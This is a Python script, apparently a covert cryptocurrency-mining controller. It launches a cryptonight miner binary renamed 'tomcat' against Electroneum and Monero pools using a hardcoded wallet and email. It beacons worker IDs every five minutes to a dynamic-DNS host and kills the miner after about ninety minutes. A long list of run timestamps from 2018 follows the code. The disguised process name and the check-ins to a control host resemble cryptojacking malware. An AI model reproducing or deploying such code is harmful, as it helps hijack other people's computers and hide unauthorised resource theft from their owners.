import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:05.782244
#2018-02-17 16:56:03.805650
#2018-02-17 18:44:07.336325
#2018-02-17 20:33:06.690869
#2018-02-17 22:19:06.346839
#2018-02-18 00:03:05.750217
#2018-02-18 01:54:01.302932
#2018-02-18 03:42:01.291857
#2018-02-18 05:28:04.649762
#2018-02-18 07:20:01.756442
#2018-02-18 09:09:06.948568
#2018-02-18 10:55:08.734541
#2018-02-18 12:43:03.978641
#2018-02-18 14:30:10.072793
#2018-02-18 16:20:07.357887
#2018-02-18 18:09:06.031455
#2018-02-18 19:55:01.643146
#2018-02-18 21:42:06.642468
#2018-02-18 23:31:06.107338
#2018-02-19 01:17:07.137217
#2018-02-19 03:04:04.957677
#2018-02-19 04:50:06.664660
#2018-02-19 06:35:07.183679
#2018-02-19 08:24:07.858217
#2018-02-19 10:14:04.243079
#2018-02-19 12:02:06.349562
#2018-02-19 13:48:12.368921
#2018-02-19 15:38:01.768892
#2018-02-19 17:25:04.800899
#2018-02-19 19:13:06.386160
#2018-02-19 21:01:07.438977
#2018-02-19 22:48:05.162918
#2018-02-20 00:32:04.843436
#2018-02-20 02:21:04.348747
#2018-02-20 04:11:06.081936
#2018-02-20 05:54:03.620644
#2018-02-20 07:40:08.802413
#2018-02-20 09:25:01.489989
#2018-02-20 11:09:04.267981
#2018-02-20 12:55:09.139621
#2018-02-20 14:39:06.080424
#2018-02-20 16:24:12.740551
#2018-02-20 18:12:01.372465
#2018-02-20 20:05:04.614780
#2018-02-20 21:51:03.853679
#2018-02-20 23:33:05.965798
#2018-02-21 01:19:01.969377
#2018-02-21 03:06:05.705495
#2018-02-21 04:54:01.256463
#2018-02-21 06:42:01.883362
#2018-02-21 08:29:05.820922
#2018-02-21 10:14:05.942807
#2018-02-21 12:03:02.259790
#2018-02-21 13:51:08.655162
#2018-02-21 15:36:11.844909
#2018-02-21 17:26:10.181684
#2018-02-21 19:14:07.102331
#2018-02-21 21:02:07.577841
#2018-02-21 22:48:01.592702
#2018-02-22 00:33:08.104106
#2018-02-22 02:20:04.402838
#2018-02-22 04:07:04.642997
#2018-02-22 05:53:03.781614
#2018-02-22 07:39:04.228981
#2018-02-22 09:27:06.399461
#2018-02-22 11:15:04.240930
#2018-02-22 13:03:04.778606
#2018-02-22 14:50:01.688272
#2018-02-22 16:36:01.855649
#2018-02-22 18:21:07.116348
#2018-02-22 20:14:01.815441
#2018-02-22 22:01:06.486656
#2018-02-22 23:49:05.860708
#2018-02-23 01:36:07.024932
#2018-02-23 03:22:03.634327
#2018-02-23 05:08:06.165937
#2018-02-23 06:54:04.877408
#2018-02-23 08:44:05.814794
#2018-02-23 11:03:01.948016
#2018-02-23 12:58:09.401688
#2018-02-23 14:43:07.590123
#2018-02-23 16:34:01.328526
#2018-02-23 18:20:05.008182
#2018-02-23 20:04:06.993592
#2018-02-23 21:48:08.068672
#2018-02-23 23:41:06.079348
#2018-02-24 01:29:06.082475
#2018-02-24 03:18:06.509660
#2018-02-24 05:03:06.028146
#2018-02-24 06:51:06.331282
#2018-02-24 08:36:06.341368
#2018-02-24 10:21:07.404693
#2018-02-24 12:16:05.423018
#2018-02-24 14:07:07.116262
#2018-02-24 15:54:05.210640
#2018-02-24 17:43:01.869389
#2018-02-24 19:28:05.332171
#2018-02-24 21:18:05.313746
#2018-02-24 23:56:05.497956
#2018-02-25 03:12:04.095516
#2018-02-25 06:45:01.460153